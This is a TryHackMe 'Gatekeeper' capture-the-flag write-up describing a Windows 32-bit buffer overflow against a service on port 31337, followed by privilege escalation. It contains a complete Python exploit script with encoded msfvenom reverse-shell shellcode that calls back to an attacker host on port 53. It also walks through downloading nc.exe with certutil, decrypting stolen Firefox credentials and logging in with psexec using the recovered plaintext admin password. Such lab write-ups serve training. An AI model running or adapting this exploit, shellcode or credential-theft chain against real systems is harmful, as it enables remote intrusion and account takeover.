Gatekeeper (W/THM)

Basic OSCP-like Buffer Overflow

TryHackMe Gatekeeper Write-Up

topics: Buffer Overflows, Windows Privilege Escalation, windows buffer overflows, hashed credentials, firefox_decrypt, psexec

  1. Enumeration

  2. Local Privilege Escalation

  3. System Privilege Escalation

new tools: Immunity Debugger

tools: nmapAutomator, python, msfvenom, nc

Enumeration

Initial nmap scan: .././autonmap.sh $ip Basic

Several ports are open on this server, and the host name GATEKEEPER and the Windows 7 fingerprint are clearly visible.

nmap suggests it could be vulnerable to EternalBlue, but a quick check confirms that is a rabbit hole.

SMB

smbclient -L //10.10.161.165 -N

There seems to be information on the Users share; let's download all of its contents and inspect them.

Inspecting Default reveals profile settings, while Share contains a Windows executable that we can debug.

"Elite?"

Port 31337 is very unusual and clearly specific to this box. Browsing to it shows only the echoed GET request and "Hello!!!" with no other information. Since the box is built around a buffer overflow, we can surmise that this service accepts input and replies with "Hello!!!".

We can test this using nc and indeed find that the port accepts unauthenticated input.

Entering a certain number of characters seems to crash the service.

Local Privilege Escalation

Finding a way to properly debug a Windows exe on Linux, or locating symbol tables to use gdb, would be too time consuming; instead I transferred the exe to a Windows 10 VM and used Immunity Debugger. Make sure the VM has this x86 program installed, is on a NAT network, and that port 31337 is open. Run gatekeeper.exe, attach to it in Immunity Debugger, press play, and begin finding the offset.

Finding Offset

We need to fuzz the program to determine at what offset our input overwrites EIP. We can use pattern_create.rb to generate a unique string and the following python program to open a socket and send the string to the listening executable.

Alternatively we can run nc -v 10.0.2.15 31337 and paste the string in manually.

We can see that the overwritten value of the instruction pointer (EIP) is 39654138. We can use pattern_offset.rb to determine the offset of those bytes in the pattern.

pattern_offset.rb -l 200 -q 39654138

We now have an offset of 146 bytes, which we fill with A's or a NOP sled. The payload layout is therefore: payload = "\x90" * 146 + "JMP ESP" + "\x90" * remainder bytes + shellcode

Identifying Bad Characters

Using this git repo, I started an nc connection on port 31337 and sent the full bad-character string to the program.

Right-click the stack pointer (ESP) in the registers pane and follow it in the hex dump.

We can see in the hex dump that the bad characters are "\x0a" and "\x00".

Finding JMP ESP Address

To find a JMP ESP address to place in EIP, we can use the command !mona jmp -r esp -m gatekeeper.exe (I had to manually install mona.py into the PyCommands folder).

We see our address is 0x080414c3, which in little-endian byte order becomes \xc3\x14\x04\x08.

payload = "\x90" * 146 + "\xc3\x14\x04\x08" + "\x90" * remainder bytes + shellcode
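The offset search above and the little-endian conversion of the JMP ESP address, as an added example (not the write-up's own code): it reproduces what pattern_create.rb and pattern_offset.rb do for the values seen on this box, packs the address the same way the payload line does, and checks a buffer against the bad characters found earlier. The function names and the 200-byte pattern length are assumptions.

```python
"""Added example: Metasploit-style cyclic pattern, offset lookup and
address packing for the Gatekeeper overflow (not the original script)."""
import string
import struct


def cyclic_pattern(length):
    """Generate the Aa0Aa1...Aa9Ab0... pattern that pattern_create.rb emits.

    Every 4-byte window is unique, which is what makes the EIP value
    seen in the debugger map back to a single offset.
    """
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(eip_hex, length=200):
    """Return the offset of the 4 bytes that landed in EIP (-1 if absent).

    eip_hex is the value exactly as Immunity shows it (e.g. '39654138');
    the bytes are reversed because x86 stores the dword little-endian.
    """
    needle = struct.pack("<I", int(eip_hex, 16)).decode("ascii")
    return cyclic_pattern(length).find(needle)


def pack_address(addr):
    """Little-endian bytes for a 32-bit address, as written into the payload."""
    return struct.pack("<I", addr)


def bad_chars_present(data, bad=(0x00, 0x0A)):
    """Return the set of bad bytes found in data (empty set means it is clean)."""
    return {b for b in data if b in bad}


if __name__ == "__main__":
    print(pattern_offset("39654138"))   # 146, matching pattern_offset.rb
    print(pack_address(0x080414C3))     # b'\xc3\x14\x04\x08'
```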

Generating Shellcode

Generating shellcode for a reverse shell is straightforward: we run the following msfvenom command, excluding the bad characters we found.

msfvenom -p windows/shell_reverse_tcp LHOST=10.6.18.145 LPORT=53 -f c -a x86 --platform windows -e x86/shikata_ga_nai -b "\x00\x0a"

Initial Access

The remainder bytes depend on the size of the buffer; by trial and error, the minimum NOP padding needed here is 5 bytes. We now have all of the attributes needed to exploit this buffer overflow and gain a reverse shell. Start a listener on port 53 and run the program: python gatekeeper.py

#!/usr/bin/env python

# Skeleton Buffer Overflow script (Python 2: str literals are byte strings)
# usage: python gatekeeper.py <targetIP> <targetPort>

import sys, socket

rhost = sys.argv[1]        # target IP
rport = int(sys.argv[2])   # target port (31337 on this box)

# msfvenom -p windows/shell_reverse_tcp LHOST=10.6.18.145 LPORT=53 -f c -a x86 --platform windows -e x86/shikata_ga_nai -b "\x00\x0a"
shellcode = ("\xb8\x50\xc6\x7c\xfb\xda\xdf\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x52\x31\x43\x12\x83\xeb\xfc\x03\x13\xc8\x9e\x0e\x6f\x3c\xdc"
"\xf1\x8f\xbd\x81\x78\x6a\x8c\x81\x1f\xff\xbf\x31\x6b\xad\x33"
"\xb9\x39\x45\xc7\xcf\x95\x6a\x60\x65\xc0\x45\x71\xd6\x30\xc4"
"\xf1\x25\x65\x26\xcb\xe5\x78\x27\x0c\x1b\x70\x75\xc5\x57\x27"
"\x69\x62\x2d\xf4\x02\x38\xa3\x7c\xf7\x89\xc2\xad\xa6\x82\x9c"
"\x6d\x49\x46\x95\x27\x51\x8b\x90\xfe\xea\x7f\x6e\x01\x3a\x4e"
"\x8f\xae\x03\x7e\x62\xae\x44\xb9\x9d\xc5\xbc\xb9\x20\xde\x7b"
"\xc3\xfe\x6b\x9f\x63\x74\xcb\x7b\x95\x59\x8a\x08\x99\x16\xd8"
"\x56\xbe\xa9\x0d\xed\xba\x22\xb0\x21\x4b\x70\x97\xe5\x17\x22"
"\xb6\xbc\xfd\x85\xc7\xde\x5d\x79\x62\x95\x70\x6e\x1f\xf4\x1c"
"\x43\x12\x06\xdd\xcb\x25\x75\xef\x54\x9e\x11\x43\x1c\x38\xe6"
"\xa4\x37\xfc\x78\x5b\xb8\xfd\x51\x98\xec\xad\xc9\x09\x8d\x25"
"\x09\xb5\x58\xe9\x59\x19\x33\x4a\x09\xd9\xe3\x22\x43\xd6\xdc"
"\x53\x6c\x3c\x75\xf9\x97\xd7\x70\xf8\x85\xb6\xed\x06\xa9\xb8"
"\xd8\x8f\x4f\xd2\x32\xc6\xd8\x4b\xaa\x43\x92\xea\x33\x5e\xdf"
"\x2d\xbf\x6d\x20\xe3\x48\x1b\x32\x94\xb8\x56\x68\x33\xc6\x4c"
"\x04\xdf\x55\x0b\xd4\x96\x45\x84\x83\xff\xb8\xdd\x41\x12\xe2"
"\x77\x77\xef\x72\xbf\x33\x34\x47\x3e\xba\xb9\xf3\x64\xac\x07"
"\xfb\x20\x98\xd7\xaa\xfe\x76\x9e\x04\xb1\x20\x48\xfa\x1b\xa4"
"\x0d\x30\x9c\xb2\x11\x1d\x6a\x5a\xa3\xc8\x2b\x65\x0c\x9d\xbb"
"\x1e\x70\x3d\x43\xf5\x30\x4d\x0e\x57\x10\xc6\xd7\x02\x20\x8b"
"\xe7\xf9\x67\xb2\x6b\x0b\x18\x41\x73\x7e\x1d\x0d\x33\x93\x6f"
"\x1e\xd6\x93\xdc\x1f\xf3")

# Layout: 146 bytes of NOP padding up to EIP, the JMP ESP address
# 0x080414c3 in little-endian order, 5 NOPs, then the shellcode
payload = "\x90" * 146 + "\xc3\x14\x04\x08" + "\x90" * 5 + shellcode

# Connect to the vulnerable service and send the payload
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((rhost, rport))
s.send(payload + '\r\n')
data = s.recv(1024)
s.close()

System Privilege Escalation

I was unable to transfer files over HTTP or use PowerShell to run all the usual checks, and I also had issues with an SMB server and with running winPEAS and Seatbelt. Instead I decided to look for clues in the Default folder.

There is a Firefox.lnk file, which Windows uses as a reference to an original file, folder, or application. Listing the contents of the file:

It points to a hidden location under \Appdata. Firefox stores saved credentials in the files below:

We'll need to transfer these files as well as cert9.db and cookies.sqlite; the page also gives the location of these files. We can decrypt them with firefox_decrypt and then use psexec.py to establish a shell.

Download nc.exe from the attacker machine with certutil.exe and transfer the four files back.

Recover the stored credentials with firefox_decrypt: python firefox_decrypt.py /root/gatekeeper/fire/

Now that we have the admin credentials, we can log in with psexec.py: python3 /usr/share/doc/python3-impacket/examples/psexec.py gatekeeper/mayor:8CL7O1N78MdrCIsV@10.10.208.42 cmd.exe
